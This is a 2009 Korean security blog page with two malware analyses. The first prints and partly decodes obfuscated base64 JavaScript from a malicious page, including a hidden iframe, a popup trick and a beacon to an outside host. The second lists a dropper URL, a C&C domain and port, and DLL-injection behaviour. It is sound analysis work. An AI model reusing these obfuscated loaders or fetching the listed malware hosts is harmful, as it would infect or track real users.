eval(fV6("dmFyIG91dD0ic2hvd01vZGFsRGlhbG9nKCdqYXZhc2NyaXB0OndpbmRvdy5vbmVycm9yPWZ1bmN0aW9uKCl7cmV0dXJuIHRyd
WV9OyBzZXRUaW1lb3V0KFwid2luZG93LmNsb3NlKClcIiw1MCk7IHg9d2luZG93Lm9wZW4oXCJhYm91dDpibGFua1wiLFwiIiArIHdvLm4gK
yAiXCIsXCIiICsgd28udiArICJcIik7ICB4LmJsdXIoKTsgd2luZG93LmNsb3NlKCknLCcnLCdoZWxwOjA7Y2VudGVyOjA7ZGlhbG9nV2lkdGg6M
TtkaWFsb2dIZWlnaHQ6MTtkaWFsb2dMZWZ0OjUwMDA7ZGlhbG9nVG9wOjUwMDA7Jyk7Ijsgby5ET00uU2NyaXB0LmV4ZWNTY3JpcHQo
b3V0KTsg"));
...
fV19(fV6('PG9iamVjdCBpZD0ib1Y5IiBvbmVycm9yPSJmVjI1PTEiIHN0eWxlPSJwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0OjE7dG9wOjE7d2lkdG
g6MTtoZWlnaHQ6MSIgY2xhc3NpZD0iY2xzaWQ6MkQzNjAyMDEtRkZGNS0xMWQxLThEMDMtMDBBMEM5NTlCQzBBIj48U0NSSVBUPmZW
MjU9MTwvU0NSSVBUPjwvb2JqZWN0Pg=='));
...
fV19(fV6('PElGUkFNRSBpZD0ib1YzIiBOQU1FPSJvVjMiIFNUWUxFPSJ2aXNpYmlsaXR5OmhpZGRlbjsgcG9zaXRpb246YWJzb2x1dGU7d2lkdGg6MTto
ZWlnaHQ6MTsiIHNyYz0iamF2YXNjcmlwdDpwYXJlbnQuZlYxMSgpIj48L0lGUkFNRT4='));
...
eval(fV6('CQlpZiAoMSArIE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDEwMCkgPCA2KSB7DQoJCQl2YXIgeD1uZXcgSW1hZ2UoKTsNCgkJCXgu
c3JjPSdodHRwOi8vd3d3LmFkb3V0cHV0LmNvbS92ZXJzaW9uMi9oaXRfcm0uY2ZtP3R5cGU9JyArIHM7DQoJCX0='));
...


fV6 함수는 다음과 같습니다.

function fV6(input) {
  var o = "";
  var chr1, chr2, chr3; var enc1, enc2, enc3, enc4;
  var i = 0;
  var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
  input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
  do {
    enc1 = keyStr.indexOf(input.charAt(i++));
    enc2 = keyStr.indexOf(input.charAt(i++));
    enc3 = keyStr.indexOf(input.charAt(i++));
    enc4 = keyStr.indexOf(input.charAt(i++));
    chr1 = (enc1 << 2) | (enc2 >> 4);
    chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
    chr3 = ((enc3 & 3) << 6) | enc4;
    o = o + String.fromCharCode(chr1);
    if (enc3 != 64) {
      o = o + String.fromCharCode(chr2);
    }
    if (enc4 != 64) {
      o = o + String.fromCharCode(chr3);
    }
  }
  while (i < input.length);
  return o;
}

입력받은 문자열들을 함수에 의해 다른 문자열로 변환하고 있습니다.
일단 fV6에 의해 변환되는 놈들만 변환을 시켜보았습니다.

PElGUkFNRSBpZD0ib1YzIiBOQU1FPSJvVjMiIFNUWUxFPSJ2aXNpYmlsaXR5OmhpZGRlbjsgcG9zaXRpb246YWJzb2x1dGU7d2lkdGg6MTto
ZWlnaHQ6MTsiIHNyYz0iamF2YXNjcmlwdDpwYXJlbnQuZlYxMSgpIj48L0lGUkFNRT4=

<IFRAME id="oV3" NAME="oV3" STYLE="visibility:hidden; position:absolute;width:1;height:1;" src="javascript:parent.fV11()"></IFRAME>

iframe이 보입니다. 헌데 src를 보니 또 뭔가 있군요..
상당히 복잡하게 꽈놓은게 눈에 보입니다.


시간상 여기까지하고 소스분석을 자세히 하지 못했습니다.
그래서 vm 웹서버에 해당 페이지 올려 놓고 vm에서 페이지를 읽어 보고 시스템에 어떤 변화가 있는지 외부로 어떤 패킷을 보내는지 확인해 보았습니다.
확인 결과 특정 웹페이지를 하나 더 요청을 하지만 해당 페이지에는 별 내용이 없었습니다.

hxxp://ad.yieldmanager.com/iframe3?AAAAALGCCQCMMx4ADZoJAAIAAAAAAP8AAAAECwICAAMLDw0AGWsEAF69DQAAAAAAAAAAAAAAAAAAAAAAAAAAAGbmlbMGb9Q.CtejcD0KB0AAQFJAMAfhPzMzMzMzMxNAAMAza1Bh7D8AAAAAAAAgQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtMDhs95AXAaEn1YSILavEJVgveudQ9JzAYG7zAAAAAA=,,http://d.xin8.info/cpx.php?did=117109&ts=2009-05-21%2011%3a26%3a52&ip=221.139.14.3&sid=9&ref=&ua=mozilla%2f4.0%20%28compatible%3b%20msie%207.0%3b%20windows%20nt%205.1%29&url=%2fdaipi%2fcss.htm&uid=15&rdr=http%3a%2f%2fwww.malkm.com%2f%3fdn%3dxin8.info%26pid%3d1poof2464&dn=xin8.info&soff=&sbid=&sinf=

해당 페이지 소스를 보면 다음과 같은 에러(?) 메시지가 보입니다.

<html><body><!-- Delivery record decoding failed with reason = 4 (Query string expired) --></body></html>


분석하는 과정에서 어떤 변화가 있어서 이런 페이지밖에 보이지 않는 것인지 알 수는 없지만

include.gif 파일을 읽는다 하더라도 시스템에는 큰 영향을 미치지 않는다고 여겨집니다.



왠지 괜한 삽질만 한게 아닌지 하는 생각이 듭니다. -_-;;





저작자 표시 비영리 변경 금지
신고
크리에이티브 커먼즈 라이선스
Creative Commons License
Posted by demantos

댓글을 달아 주세요

  1. 슈멘달려

    분석글 감시히 봣습니다. ^^

    2009.05.21 09:17 신고 [ ADDR : EDIT/ DEL : REPLY ]
  2. fV6() 함수는 base64 디코딩 함수입니다. -_-;;
    웹에서 base64 decoder 찾으셔서 입력하시면 디코딩됩니다.

    2009.05.21 13:10 신고 [ ADDR : EDIT/ DEL : REPLY ]
  3. 잘읽어어요.
    Gif+Jar
    Gif+javascript
    변종이 많군요..ㅎ

    담달안에 꼭 술한잔 사드릴께요.

    2009.05.21 23:42 신고 [ ADDR : EDIT/ DEL : REPLY ]
    • 근데 난 잘 안되드라고..
      내꺼 vm에서도 실행이 안되고 그냥 텍스트로 읽혀서
      좀 더 연구해봐야할 듯..

      2009.05.22 10:36 신고 [ ADDR : EDIT/ DEL ]

0x02 analysis2009.05.18 13:35

새로운(?) 도메인을 알게 되서 포스팅합니다.
hapt03.cn은 이미 잘 알려져 있는 듯 한데 국내에서는 아직인 듯 합니다.
FF로 해당 사이트에 웹으로 접속하면 경고 메시지가 뜹니다.




해당 사이트에 접속시엔 500 Internal Server Error가 나옵니다. 하지만 해당 디렉토리에는 몇개의 파일이 있는 듯 한데
그중에서 하나의 파일을 찾았습니다.

hxxp://shaody.1.jp.hapt03.cn/hack.exe

해당 파일을 다운 받으면 Antivir에서 악성코드라고 잡더군요..
바이러스토탈에 넣어 봤더니 40개 엔진중 18개에서만 탐지가 되고 있었습니다.
V3와 nProtect에서는 탐지가 되고 있었으며 바이로봇에서는 아직 탐지하지 못하는 듯 합니다.
헌데 바이로봇은 15일자 엔진으로 검색하는걸 보니 엔진 업데이트 후 탐지할 가능성도 있습니다.


일단 항상 하던대로 실행시켜보았습니다.




nvhai520.3322.org의 8800번 포트로 접속하는 것을 볼 수 있습니다. 아직도 3322.org는 애용되고 있군요...-_-;;

Winalysis에서 시스템의 변화를 살펴보니 역시나 레지스트리를 여러개 변경하였고 서비스를 하나 등록하는걸 확인하였습니다.
헌데 파일에는 변화가 없다고 나오지만 실제로 살펴보면 svchost.exe에 dll injection을 하고 있었습니다.




시간을 보시면 파일을 실행했던 시간이 나오고 있습니다. 이름부터 좀 이상하죠.. fakqvekk.dll
그리고 해당 프로세스가 nvhai520.3322.org(59.34.245.21)로 접속하는 걸 볼 수 있습니다.




도메인명이 좀 다른데 Reverse-Lookup을 해서 가져온 도메인이 원 도메인명과 약간 다른 듯 합니다.
아무튼 fakqvekk.dll이라는 파일은 새로 생성된 파일인데도 Winalysis에서 못 잡네요...
파일명은 랜덤으로 생성되는 것으로 보입니다.




그리고 다른 악성코드들과는 좀 다르게 C:\WINDOWS\ssytem32에 파일을 생성하는 것이 아니라
C:\WINDOWS\system32\drivers\etc에 생성하고 있었습니다.

그리고 특이한점은 kTGsJaDDRj.ini라는 파일을 생성한 것인데 파일엔 아무런 내용도 없었는데 파일의 크기는 3바이트였습니다.
그래서 데이터 스트림이 있는건 아닐까 하고 lads로 검사해봤지만 데이터 스트림이 숨겨져 있지는 않았습니다.

lads : http://www.heysoft.de/Frames/f_sw_la_en.htm



결국 shaody.1.jp.hapt03.cn은 Dropper임을 확인할 수 있었고 다운 받은 hack.exe라는 파일이 실행되면
nvhai520.3322.org의 8800번 포트로 연결하는 것으로 보아 nvhai520.3322.org는 C&C인 듯 합니다.

뭐...3322.org 자체가 대부분의 ISP에서 차단되어 있기 때문에 큰 영향력을 미치지는 않을 듯 합니다만
동일한 악성코드가 도메인을 바꾸거나 IP로 접속하게 할 경우엔 봇으로 동작할 우려가 아직 남아 있습니다.





저작자 표시 비영리 변경 금지
신고
크리에이티브 커먼즈 라이선스
Creative Commons License
Posted by demantos

댓글을 달아 주세요

  1. 상당히 아쉽게도 해당 사이트에 접속이 안되네요.. ㅠ_ㅠ)!!

    2009.05.20 16:28 신고 [ ADDR : EDIT/ DEL : REPLY ]
    • 도메인이 막혔을 가능성이 큽니다.
      dropper나 C&C 도메인들은 ISP에서 IP를 반환을 해주지 않거나
      로컬호스트 IP를 주도록 설정하는 것이 일반적이거든요
      물론 KISA Sinkhole로 보내기도 하구요
      DNS를 다른걸로 잡아보심이 좋을 듯 합니다.

      2009.05.21 09:14 신고 [ ADDR : EDIT/ DEL ]
  2. 아하~ 넵^^ 감사합니다

    2009.05.21 10:45 신고 [ ADDR : EDIT/ DEL : REPLY ]


티스토리 툴바